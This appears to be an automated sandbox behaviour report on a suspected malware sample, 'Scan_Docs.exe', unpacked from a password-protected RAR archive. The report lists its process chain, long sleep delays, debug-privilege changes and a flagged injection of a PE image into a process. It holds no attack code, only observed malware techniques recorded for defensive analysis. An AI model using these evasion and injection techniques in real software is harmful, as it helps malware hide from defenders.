                Source: C:\Users\user\AppData\Local\Temp\czb3sk2g.igc\Scan_Docs.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\czb3sk2g.igc\Scan_Docs.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\czb3sk2g.igc\Scan_Docs.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\czb3sk2g.igc\Scan_Docs.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\czb3sk2g.igc\Scan_Docs.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\czb3sk2g.igc\Scan_Docs.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\czb3sk2g.igc\Scan_Docs.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\czb3sk2g.igc\Scan_Docs.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\czb3sk2g.igc\Scan_Docs.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\czb3sk2g.igc\Scan_Docs.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\czb3sk2g.igc\Scan_Docs.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\czb3sk2g.igc\Scan_Docs.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\czb3sk2g.igc\Scan_Docs.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\czb3sk2g.igc\Scan_Docs.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\czb3sk2g.igc\Scan_Docs.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\czb3sk2g.igc\Scan_Docs.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\czb3sk2g.igc\Scan_Docs.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\czb3sk2g.igc\Scan_Docs.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\czb3sk2g.igc\Scan_Docs.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\czb3sk2g.igc\Scan_Docs.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\czb3sk2g.igc\Scan_Docs.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\czb3sk2g.igc\Scan_Docs.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\czb3sk2g.igc\Scan_Docs.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\czb3sk2g.igc\Scan_Docs.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\czb3sk2g.igc\Scan_Docs.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\czb3sk2g.igc\Scan_Docs.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\czb3sk2g.igc\Scan_Docs.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\czb3sk2g.igc\Scan_Docs.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\czb3sk2g.igc\Scan_Docs.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\czb3sk2g.igc\Scan_Docs.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\czb3sk2g.igc\Scan_Docs.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\czb3sk2g.igc\Scan_Docs.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\czb3sk2g.igc\Scan_Docs.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\czb3sk2g.igc\Scan_Docs.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\czb3sk2g.igc\Scan_Docs.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\czb3sk2g.igc\Scan_Docs.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\czb3sk2g.igc\Scan_Docs.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\czb3sk2g.igc\Scan_Docs.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\czb3sk2g.igc\Scan_Docs.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\czb3sk2g.igc\Scan_Docs.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\czb3sk2g.igc\Scan_Docs.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\czb3sk2g.igc\Scan_Docs.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\czb3sk2g.igc\Scan_Docs.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\czb3sk2g.igc\Scan_Docs.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\czb3sk2g.igc\Scan_Docs.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\czb3sk2g.igc\Scan_Docs.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\czb3sk2g.igc\Scan_Docs.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\czb3sk2g.igc\Scan_Docs.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\czb3sk2g.igc\Scan_Docs.exeProcess information set: NOGPFAULTERRORBOXJump to behavior

                Source: C:\Windows\SysWOW64\unarchiver.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\czb3sk2g.igc\Scan_Docs.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\czb3sk2g.igc\Scan_Docs.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\SysWOW64\unarchiver.exe TID: 2432Thread sleep count: 61 > 30Jump to behavior
                Source: C:\Windows\SysWOW64\unarchiver.exe TID: 2432Thread sleep time: -30500s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\unarchiver.exe TID: 3148Thread sleep time: -922337203685477s >= -30000sJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\czb3sk2g.igc\Scan_Docs.exe TID: 3688Thread sleep time: -922337203685477s >= -30000sJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\czb3sk2g.igc\Scan_Docs.exe TID: 4708Thread sleep count: 191 > 30Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\czb3sk2g.igc\Scan_Docs.exe TID: 4524Thread sleep time: -922337203685477s >= -30000sJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\czb3sk2g.igc\Scan_Docs.exe TID: 3220Thread sleep time: -60000s >= -30000sJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\czb3sk2g.igc\Scan_Docs.exeCode function: 6_2_00403D74 FindFirstFileW,FindNextFileW,FindFirstFileW,FindNextFileW,6_2_00403D74
                Source: C:\Windows\SysWOW64\unarchiver.exeCode function: 0_2_0168B042 GetSystemInfo,0_2_0168B042
                Source: C:\Users\user\AppData\Local\Temp\czb3sk2g.igc\Scan_Docs.exeProcess information queried: ProcessInformationJump to behavior

                Source: C:\Users\user\AppData\Local\Temp\czb3sk2g.igc\Scan_Docs.exeCode function: 6_2_0040317B mov eax, dword ptr fs:[00000030h]6_2_0040317B
                Source: C:\Users\user\AppData\Local\Temp\czb3sk2g.igc\Scan_Docs.exeCode function: 6_2_00402B7C GetProcessHeap,RtlAllocateHeap,6_2_00402B7C
                Source: C:\Users\user\AppData\Local\Temp\czb3sk2g.igc\Scan_Docs.exeProcess token adjusted: DebugJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\czb3sk2g.igc\Scan_Docs.exeProcess token adjusted: DebugJump to behavior
                Source: C:\Windows\SysWOW64\unarchiver.exeMemory allocated: page read and write | page guardJump to behavior

                HIPS / PFW / Operating System Protection Evasion:

                barindex
                Injects a PE file into a foreign processesShow sources
                Source: C:\Users\user\AppData\Local\Temp\czb3sk2g.igc\Scan_Docs.exeMemory written: C:\Users\user\AppData\Local\Temp\czb3sk2g.igc\Scan_Docs.exe base: 400000 value starts with: 4D5AJump to behavior
                Source: C:\Windows\SysWOW64\unarchiver.exeProcess created: C:\Windows\SysWOW64\7za.exe 'C:\Windows\System32\7za.exe' x -pinfected -y -o'C:\Users\user\AppData\Local\Temp\czb3sk2g.igc' 'C:\Users\user\Desktop\Scan_Docs.rar'Jump to behavior
                Source: C:\Windows\SysWOW64\unarchiver.exeProcess created: C:\Windows\SysWOW64\cmd.exe 'cmd.exe' /C 'C:\Users\user\AppData\Local\Temp\czb3sk2g.igc\Scan_Docs.exe'Jump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\czb3sk2g.igc\Scan_Docs.exe C:\Users\user\AppData\Local\Temp\czb3sk2g.igc\Scan_Docs.exeJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\czb3sk2g.igc\Scan_Docs.exeProcess created: C:\Users\user\AppData\Local\Temp\czb3sk2g.igc\Scan_Docs.exe C:\Users\user\AppData\Local\Temp\czb3sk2g.igc\Scan_Docs.exeJump to behavior
                Source: Scan_Docs.exe, 00000006.00000002.958867069.00000000012D0000.00000002.00000001.sdmpBinary or memory string: Shell_TrayWnd
                Source: Scan_Docs.exe, 00000006.00000002.958867069.00000000012D0000.00000002.00000001.sdmpBinary or memory string: Progman
                Source: Scan_Docs.exe, 00000006.00000002.958867069.00000000012D0000.00000002.00000001.sdmpBinary or memory string: Progmanlock
                Source: Scan_Docs.exe, 00000006.00000002.958867069.00000000012D0000.00000002.00000001.sdmpBinary or memory string: =Program Managerb

                Source: C:\Windows\SysWOW64\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\czb3sk2g.igc\Scan_Docs.exeQueries volume information: C:\Users\user\AppData\Local\Temp\czb3sk2g.igc\Scan_Docs.exe VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\czb3sk2g.igc\Scan_Docs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\czb3sk2g.igc\Scan_Docs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\czb3sk2g.igc\Scan_Docs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Build.Utilities.v4.0\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.Build.Utilities.v4.0.dll VolumeInformation